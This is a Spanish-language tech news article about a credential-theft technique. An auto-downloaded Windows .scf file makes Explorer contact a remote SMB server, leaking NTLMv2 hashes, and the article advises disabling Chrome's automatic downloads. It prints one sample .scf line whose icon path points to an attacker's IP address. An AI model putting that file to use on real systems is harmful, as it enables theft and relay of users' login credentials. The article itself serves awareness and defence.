Saltar al contenido

Cómo hackear los detalles de inicio de sesión de Windows usando Google Chrome y archivos SCF

Bytes cortos: Al combinar una falla en el funcionamiento del protocolo de red SMB y los archivos .scf de Windows, un investigador de seguridad ha creado un método único de pirateo de Windows. Con solo acceder a la carpeta con un archivo .scf especialmente diseñado, el usuario terminará compartiendo las credenciales de la computadora a través del protocolo Chrome y SMB. Se recomienda a los usuarios desactivar la función de descarga automática en el navegador web Google Chrome. El investigador también espera que Google pronto aborde este problema.

SMB, o Server Message Blocks, es un protocolo de intercambio de archivos en red que se implementa en Microsoft Windows. Usando el protocolo SMB, una aplicación puede acceder a archivos en un servidor remoto y recursos como impresoras, ranuras de correo, etc. Los ataques al sistema operativo Windows a través del uso compartido de archivos SMB ya son un problema conocido, pero se limitan a las redes de área local. En un nuevo desarrollo, un investigador de seguridad ha ideado un ataque de este tipo utilizando Google Chrome. suscribir a Fossbytes

Este ataque al sistema operativo Windows funciona al aprovechar el comportamiento de Chrome de descargar automáticamente los archivos que considere seguros. Chrome descarga los archivos a una ubicación predeterminada y no solicita lo mismo. Supongamos que se descarga un archivo malicioso en el sistema. En ese caso, el usuario tendría que interactuar con el archivo para realizar acciones maliciosas. ¿Qué pasa si hay archivos que no necesitan ninguna interacción para tales acciones?

Archivo .SCF + Protocolo SMB + Google Chrome

Uno de estos tipos de archivo es el archivo de comandos del shell de Windows Explorer (archivos .scf). Admite algunos comandos del Explorador de Windows, como mostrar el escritorio o abrir una ventana del Explorador de Windows. Un archivo .scf, si está almacenado en el disco, recupera un archivo de icono cuando se carga en una ventana del Explorador de Windows.

El investigador de seguridad serbio Bosko Stankovic de DefenseCode combinó estos dos conceptos del protocolo SMB y el archivo .scf para diseñar un nuevo tipo de ataque de piratería.

Se puede usar un archivo .scf para engañar a Windows para que autentique un servidor SMB remoto. Así es como se verá el contenido del archivo:

[Shell] IconFile = \ 170.170.170.170 icon

Después de que un usuario descarga el archivo en el sistema, se activa tan pronto como se abre la carpeta de descarga para ver el archivo. Tenga en cuenta que uno no necesita hacer clic / abrir este archivo; El Explorador de archivos de Windows intenta cargar automáticamente el icono.

El resto del trabajo lo realiza el servidor SMB remoto que se configura mediante una fuerza notoria. El servidor está listo para capturar el nombre de usuario y el hash de contraseña NTLMv2, que se puede descifrar sin conexión. El servidor también puede configurarse para retransmitir esta conexión a algún servicio externo que necesite tales credenciales.

Derrotar el robo de credenciales de inicio de sesión de Windows

El investigador de seguridad aconseja a los usuarios desactivar las descargas automáticas en Google Chrome. Para ello, hay que abrir Mostrar configuración avanzada en Ajustes. Allí, compruebe el Pregunte dónde guardar cada archivo antes de descargar.

Este cambio obligará a Google a solicitar su permiso antes de descargar un archivo. El investigador también espera que Google Chrome pronto aborde esta falla.

¿Le resultó útil este artículo sobre la piratería de Windows con Google Chrome, el archivo .SCF y el protocolo SMB? No olvides compartir tus opiniones.

Califica este Articulo!